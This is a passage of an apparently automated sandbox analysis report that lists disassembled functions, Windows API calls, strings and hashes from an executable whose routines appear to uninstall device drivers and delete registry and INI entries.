                                  • Opcode ID: d7f09084c86c9a10c80aef94f3f7b95fa1bc23e71c02ecf9e232bfa91940cde6
                                  • Instruction ID: fe13c39e3d2608dd657741dee590182fd192bab57f398855da69cc361005ee78
                                  • Opcode Fuzzy Hash: d7f09084c86c9a10c80aef94f3f7b95fa1bc23e71c02ecf9e232bfa91940cde6
                                  • Instruction Fuzzy Hash: 7811BE722003096FC314DB388D49DAB7BADEBC8351F09462CBA16D3291DA24E8088BA5
                                  Function 004050E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004051BA
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004051E9
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00405239
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: EnumInfoOpenQuery
                                  • String ID: NULL$UninstCommandClass::NvRegEnumAndDeleteSubKeys(HKEY,%s,%s)
                                  • API String ID: 1906016947-1079483241
                                  • Opcode ID: ba24c0bd6675a1cf136ed3de6474397ff31bf88f88f1728414760d51e5e31da4
                                  • Instruction ID: b9939a5010867bf7737fe1208572260fbde61c2ed9772f49c17cd458b6d82167
                                  • Opcode Fuzzy Hash: ba24c0bd6675a1cf136ed3de6474397ff31bf88f88f1728414760d51e5e31da4
                                  • Instruction Fuzzy Hash: 8441BF316043459BD720CF24DC85BABB7E9EF88714F444A2DF994A7280E774A908CB9A
                                  Function 004092E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040932D
                                  • _memset.LIBCMT ref: 0040934A
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI(?,?,00000128), ref: 00409389
                                  • SetupDiCallClassInstaller.SETUPAPI(00000016,?,?), ref: 00409397
                                  • SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000002), ref: 004093A5
                                  • SetupDiDestroyDriverInfoList.SETUPAPI(?,?,00000002), ref: 00409420
                                  Strings
                                  • UninstCommandClass::InstallDeviceCallBack, xrefs: 0040931A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$DeviceDriverInfoListTime_fputs$BuildCallClassDebugDestroyFormatInstallInstallerLocalMutexObjectOutputParamsReleaseSelectedSingleStringWait_fprintf_memset
                                  • String ID: UninstCommandClass::InstallDeviceCallBack
                                  • API String ID: 2604346630-2910946198
                                  • Opcode ID: 827232f7c0347f3a07f41d42ca0f6bc79bddd5940d63469b9b8f40e83be7c7eb
                                  • Instruction ID: 382feb36e514dc5934cb95c373b2ec22359372e3c983ae7f33deb5fd3f0ffb83
                                  • Opcode Fuzzy Hash: 827232f7c0347f3a07f41d42ca0f6bc79bddd5940d63469b9b8f40e83be7c7eb
                                  • Instruction Fuzzy Hash: 47316F72604345AFD210DB60DC45EBF73A8EBC8748F44493DF946A72C2DB789C0987A6
                                  Function 004082D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106comsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CoCreateInstance.OLE32(00421400,00000000,00000001,00421330,?), ref: 004082FD
                                  • SysStringLen.OLEAUT32(00000000), ref: 00408321
                                  • Sleep.KERNEL32(000003E8), ref: 00408364
                                  • SysFreeString.OLEAUT32(00000000), ref: 0040836F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$Time_fputs$CreateDebugFormatFreeInstanceLocalMutexObjectOutputReleaseSingleSleepWait_fprintf
                                  • String ID: ConnectToNamespace$Root\WMI
                                  • API String ID: 977819115-3538068258
                                  • Opcode ID: 367d0bb582838942f685d447f89c034ea213efdbe855f548ba1f2da10da360d6
                                  • Instruction ID: d4aa90a0350b6affff37f79d485cc322f1fb7b921a80e8e8632ff4c7574bdc84
                                  • Opcode Fuzzy Hash: 367d0bb582838942f685d447f89c034ea213efdbe855f548ba1f2da10da360d6
                                  • Instruction Fuzzy Hash: B2310335740300AFD610DB69EC81F5FB399EBC4B10F24852AFA88D73D0DA3AE80587A5
                                  Function 004052A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004052D5
                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 004052E9
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 004052F9
                                    • Part of subcall function 004050E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 004051BA
                                    • Part of subcall function 004050E0: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004051E9
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00405313
                                  • GetLastError.KERNEL32 ref: 00405319
                                  • RegCloseKey.ADVAPI32(?), ref: 00405330
                                  Strings
                                  • UninstCommandClass::NvRegDeleteKeyNT, xrefs: 004052A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Delete$OpenTime_fputs$CloseDebugErrorFormatInfoLastLocalMutexObjectOutputQueryReleaseSingleStringValueWait_fprintf
                                  • String ID: UninstCommandClass::NvRegDeleteKeyNT
                                  • API String ID: 628836260-4137488362
                                  • Opcode ID: 320164d62f16311af865955130db9309a5d6561766e9063156227dd01fbcb1e9
                                  • Instruction ID: 29a9d018e0bd542de6d2119d5640a19205c346277f682fa9cb1fc162e634e8b2
                                  • Opcode Fuzzy Hash: 320164d62f16311af865955130db9309a5d6561766e9063156227dd01fbcb1e9
                                  • Instruction Fuzzy Hash: 39115171604714ABC710DF22AC48E6BBBACFB88795F44483DB955A3250DB78ED04CBA9
                                  Function 00406780 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiCallClassInstaller.SETUPAPI(?,?,?), ref: 004067C0
                                  • _memset.LIBCMT ref: 004067D9
                                  • SetupDiGetDeviceInstallParamsA.SETUPAPI ref: 004067F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: SetupTime_fputs$CallClassDebugDeviceFormatInstallInstallerLocalMutexObjectOutputParamsReleaseSingleStringWait_fprintf_memset
                                  • String ID: Class installer %s a reboot$UninstCommandClass::NvUninstCallClassInstaller$doesn't require$requires
                                  • API String ID: 411429485-695916807
                                  • Opcode ID: bbc810f8c69c1c04220c4bc6e2449fe2ca617bf85757c3a969a0e9037ffc1285
                                  • Instruction ID: 3a03dc70e95dcd0f9d0dfb85e2f5997b9cfde918ff3b78563f1fa6d51592affe
                                  • Opcode Fuzzy Hash: bbc810f8c69c1c04220c4bc6e2449fe2ca617bf85757c3a969a0e9037ffc1285
                                  • Instruction Fuzzy Hash: 4B11E3716053406BD220EF58DC45FEFBBE8EF98305F04483EB44897291DB789A1887DA
                                  Function 004124FA Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 220COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __sopen_s
                                  • String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                  • API String ID: 2693426323-1656882147
                                  • Opcode ID: 7b4a3ac31289e3211d80225ae70a71ebf49ae5dce4e9220ca253acfa1b6a6d69
                                  • Instruction ID: d5db8d6a7bb4df7894db12632077b3b1d5c33c3903a0276cd580189d641943cf
                                  • Opcode Fuzzy Hash: 7b4a3ac31289e3211d80225ae70a71ebf49ae5dce4e9220ca253acfa1b6a6d69
                                  • Instruction Fuzzy Hash: 7271B271904209AFDF248F5586453EB7BA0AB00314F24C06FE859E62D1D7FC8AE28F4D
                                  Function 0040E5FE Relevance: 10.7, APIs: 7, Instructions: 158COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • getSystemCP.LIBCMT ref: 0040E617
                                    • Part of subcall function 0040E584: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040E591
                                    • Part of subcall function 0040E584: GetOEMCP.KERNEL32(00000000), ref: 0040E5AB
                                  • setSBCS.LIBCMT ref: 0040E629
                                    • Part of subcall function 0040E301: _memset.LIBCMT ref: 0040E314
                                  • IsValidCodePage.KERNEL32(-00000030), ref: 0040E66F
                                  • GetCPInfo.KERNEL32(00000000,?), ref: 0040E682
                                  • _memset.LIBCMT ref: 0040E69A
                                  • setSBUpLow.LIBCMT ref: 0040E76D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                  • String ID:
                                  • API String ID: 2658552758-0
                                  • Opcode ID: b9a06a9f12667d6689ceee42e5f1632b56583e13c156d34b7b19591f98919917
                                  • Instruction ID: 118644a9b875480cf5c774309ac6f097de70fa0ab39b048be9a5e0c4ab42d155
                                  • Opcode Fuzzy Hash: b9a06a9f12667d6689ceee42e5f1632b56583e13c156d34b7b19591f98919917
                                  • Instruction Fuzzy Hash: 745106319042548BDF259F66C8846BEBBF4EF05304F14887FD881AB2C2D63D9862CB98
                                  Function 004025B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B58A: __mbschr_l.LIBCMT ref: 0040B594
                                  • _sscanf.LIBCMT ref: 00402664
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _fprintf.LIBCMT ref: 004026F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __mbschr_l__mbsicmp_l_fprintf_sscanf
                                  • String ID: %s %s$CommandClass::Execute(%s)$Execute: unknown command$NULL
                                  • API String ID: 1777824336-125213581
                                  • Opcode ID: 8cfe0e35b7d91d4407ab049514371496b79488eda76f4aa58d6943b870c35c3f
                                  • Instruction ID: 920062bc3e6fd7872550115d0e9e6481160d8355d39fa3b0ec2652908e8cf63b
                                  • Opcode Fuzzy Hash: 8cfe0e35b7d91d4407ab049514371496b79488eda76f4aa58d6943b870c35c3f
                                  • Instruction Fuzzy Hash: 0631277260420027C600BA7A5D55E6B369CDE91329B14093FF840B73D2EE7ED90441FE
                                  Function 0040A860 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040A8DC
                                  • GetPrivateProfileStringA.KERNEL32(?,?,(error),?,00000080,?), ref: 0040A8FB
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040A936
                                  Strings
                                  • NvDelIniIfMatched: invalid number of arguments, xrefs: 0040A968
                                  • UninstCommandClass::NvDelIniIfMatched, xrefs: 0040A87D
                                  • (error), xrefs: 0040A8F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: StringTime_fputs$AttributesDebugFileFormatLocalMutexObjectOutputPrivateProfileReleaseSingleWait__mbsicmp_l_fprintf_memset
                                  • String ID: (error)$NvDelIniIfMatched: invalid number of arguments$UninstCommandClass::NvDelIniIfMatched
                                  • API String ID: 3117745127-2609768157
                                  • Opcode ID: 2e79e1604ffd96bba8d33c8cb4a33a41982f893e6f1b50500e1ab2d75ca925d5
                                  • Instruction ID: e921b22d3d92975d434fcb7cb712d2a482d1a37cddd37424c79be88bd14d2ebf
                                  • Opcode Fuzzy Hash: 2e79e1604ffd96bba8d33c8cb4a33a41982f893e6f1b50500e1ab2d75ca925d5
                                  • Instruction Fuzzy Hash: A831F9717003016BD310E725CC86FAB7799AF84704F04883EF949A32C2DA7CB91983AA
                                  Function 00406258 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetupDiEnumDeviceInfo.SETUPAPI(00000000,?,00000001), ref: 00406299
                                  • _memset.LIBCMT ref: 004062B3
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,?,?,00000400,00000000), ref: 004062CD
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
